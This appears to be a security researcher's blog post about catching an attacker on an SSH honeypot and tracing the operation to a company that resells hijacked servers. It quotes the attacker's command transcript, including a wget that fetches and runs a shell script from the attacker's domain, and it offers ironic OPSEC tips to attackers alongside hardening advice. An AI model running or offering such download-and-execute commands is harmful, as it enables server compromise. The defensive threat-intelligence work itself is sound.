I observed a hacker trying to compromise one of my internet-facing Linux servers and repurpose it to sell to unknowing legitimate customers.
Last year I built a system called Animus. In a nutshell, Animus is a intelligent system that discovers and reports information related to what bad guys are doing across the Internet and publishes the data free of charge. I won't go into how Animus works in this post because that is a blog post in and of itself. The important part is that Animus has discovered over 10,000 attacker IP addresses, identified hundreds of malware command and control (C2) servers, intercepted countless malware samples and hacker tools, and observed thousands of denial of service attacks against various websites. If you'd like more information on what Animus is or how it works, check out the talk I gave at Shmoocon 2015 called "No Budget Threat Intelligence".
A few days ago, Animus reported that a bad guy had attacked one of my sensors and attempted to download and install a backdoor. This is nothing unusual- I see hundreds of thousands of attacks every day.
The hacker gained access to my sensor by bruteforcing a username and password combination that I had configured it to allow via SSH. What the hacker didn't realize is that I was logging everything she was doing.
The following is a recording of this particular hacker executing commands on my server, in real time, for your viewing pleasure:
If you don't feel like watching a terminal recording of someone slowly pasting commands into a Linux server like some kind of psychopath, here's a quick transcript of the commands she executed:
wget http://huthos.com/script/minidebian7.sh chmod +x minidebian7.sh chmod +x minidebian7.sh chmod +x minidebian7.sh ./minidebian7.sh cat /etc/*release* cat /proc/version chmod +x minidebian7.sh ./minidebian7.sh cat /dev/net/tun echo 'net.core.wmem_max=12582912' >> /etc/sysctl.conf echo 'net.core.rmem_max=12582912' >> /etc/sysctl.conf echo 'net.ipv4.tcp_rmem= 10240 87380 12582912' >> /etc/sysctl.conf echo 'net.ipv4.tcp_wmem= 10240 87380 12582912' >> /etc/sysctl.conf echo 'net.ipv4.tcp_window_scaling = 1' >> /etc/sysctl.conf echo 'net.ipv4.tcp_timestamps = 1' >> /etc/sysctl.conf echo 'net.ipv4.tcp_sack = 1' >> /etc/sysctl.conf echo 'net.ipv4.tcp_no_metrics_save = 1' >> /etc/sysctl.conf echo 'net.core.netdev_max_backlog = 5000' >> /etc/sysctl.conf sysctl -p sysctl -p
The attack originated from the following IP address:
...which is located in Singapore. It also appears that the hackers attack machine may be hosting an unauthenticated web proxy according to Shodan, just in case you're wondering what the inside of their network looks like.
Let's dig into the attack a little bit.
Once the attacker logged in, she downloaded a shell script from the following URL and attempted to execute it:
I uploaded a mirror of the shell script onto Pastebin, which can be accessed here. Basically, this shell script modifies some configurations of the victim server, uninstalls several packages, installs a Dropbear SSH server and a BadVPN peer-to-peer VPN gateway, Installs Webmin, performs some hardening tasks, then reboots the server.
I don't believe this group is running a terribly huge operation, since this is the only attack I've seen from this IP address.
@Andrew___Morris Number of attacks from 220.127.116.11: 1 First attack: Apr 9, 2015 Most recent attack: Apr 9, 2015— Animus Threat Bot (@threatbot) April 12, 2015
Which then begs another question...
so wtf is Huthos?
Turns out huthos.com is a company that "offers" "cloud" "services". And by offers cloud services, I mean they hack into machines on the internet and sell them to unknowing customers. God awful website aside, they market themselves as a legitimate Indonesian VPS and VPN provider, which makes me want to cry.
Due to poor operational security practices, I managed to find the site owner's real name, address, Facebook, Google Plus account, and YouTube channel in a few minutes. I won't post it on here because it isn't my intention to start a witch hunt.
If you're going to do evil things like this (first of all, don't. I will hunt you down and ruin your life) then you have to take a few steps to protect yourself. There are a few major fuckups here.
- Don't execute operations on honeypots. Do some recon during your targeting phase
- If you're conducting a widespread automated campaign, figure out a way to identify and avoid honeypots
- Don't host malware on your organization's website
- Don't host malware anywhere that can be tied to your identity
- Lock down your servers for God's sake
- Don't put your Facebook account in your malware samples
- Make sure you lock down any externally exposed administrative interfaces
- If you're using SSH, disable password authentication and configure SSH keys
- If you can't use SSH keys, use strong passwords
- Check your servers for the artifacts I've discussed today
- Check your logs for traffic to or from the attacker IP address
Hopefully you've learned something from reading this post. If nothing else, it always warms my heart to make a bad guys life more difficult. If anyone has a law enforcement or CERT contact in Indonesia or Singapore, please shoot me an email.
And remember, I'm watching you.